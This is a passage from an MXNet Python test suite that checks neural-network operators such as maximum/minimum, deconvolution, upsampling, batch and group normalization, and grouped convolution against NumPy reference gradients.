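# Analytic gradients: d/dx rsqrt(x) = -1/(2*x*sqrt(x)), d/dx cos(x) = -sin(x), d/dx sin(x) = cos(x).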
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
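# maximum routes the gradient to the larger input and minimum to the smaller one;
# with data_tmp1 = 2 and data_tmp2 = 3 there are no ties to worry about.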
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias=True, name="conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias=True, name="deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
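# With stride 1 and kernel = 2*pad + 1, both the convolution and the deconvolution
# preserve the spatial shape of their input.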
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias=True, name="conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias=True, name="deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
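# When target_shape is supplied, Deconvolution infers the output spatial size from it
# directly; pad/adj do not affect the inferred shape (see the pad=(99,...), adj=(101,...)
# calls below, which are marked "will be ignored").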
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
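# Forward-only smoke test: converting the output to numpy synchronizes the computation
# and would surface any failure in the bias-enabled forward pass.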
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
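# Standard bilinear-interpolation initialization: each weight decays linearly with its
# distance from the kernel centre c.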
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = (shape[1],)
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
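# expand_shape lets the per-channel gamma/beta and moments broadcast along the chosen axis.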
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
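# Manually compute the BatchNorm backward pass by applying the chain rule through
# y = (x - mean) / sqrt(var + eps) * gamma + beta.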
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
dshape = data.shape
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
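# Reference GroupNorm backward, derived by applying the chain rule through
# x_hat = (x - mean) / std within each group.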
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
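# Reference: a grouped convolution equals slicing the input channels, weights and bias
# per group, convolving each slice, and concatenating the results.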
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
